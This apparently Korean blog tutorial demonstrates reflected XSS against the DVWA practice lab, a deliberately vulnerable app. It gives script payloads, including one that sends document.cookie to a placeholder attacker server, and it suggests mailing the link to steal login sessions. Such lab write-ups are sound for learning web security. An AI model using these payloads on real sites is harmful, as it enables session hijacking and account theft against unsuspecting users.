이전의 xss 공격은 서버에 공격 스크립트를 저장해 두고 이를 유저가 보게 만들었습니다. 이번에는 서버에 저장되지 않을 때 어떻게 하는지에 대한 것입니다.
dvwa의 xss reflected로 갑니다.
여기서 <script>alert('!')</script>를 입력합니다. 그럼 아래처럼 알림이 나옵니다.
즉, 저희가 원하는 스크립트를 실행할 수 있다는 뜻입니다.
그리고 url을 보면 저희가 넣은 값이 인코딩된 채로 보여집니다.
http://172.30.1.7/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%27%21%27%29%3C%2Fscript%3E#
쿠키를 탈취해 로그인 정보를 가져옵시다.
<script>alert(document.cookie)</script>를 하면 쿠키를 얻을 수 있습니다.
그리고 document.location으로 특정 사이트로 이동시킬 수 있습니다.
<script>document.location='https://www.naver.com'</script>
그렇다면 공격자가 만든 웹 서버로 쿠키 정보를 담아 이동시킬 수도 있습니다.
<script>document.location='{공격자 서버 ip}?'+document.cookie</script>
이 링크를 메일로 보내면 로그인 정보를 얻을 수 있습니다.
'해킹 슈퍼 기초 연습' 카테고리의 다른 글
webgoat 사용법 (0) | 2024.08.28 |
---|---|
webgoat 세팅 (0) | 2024.08.21 |
dvwa sql injection (blind) (0) | 2024.08.06 |
dvwa CSRF (0) | 2024.08.03 |
dvwa Command Execution (0) | 2024.07.27 |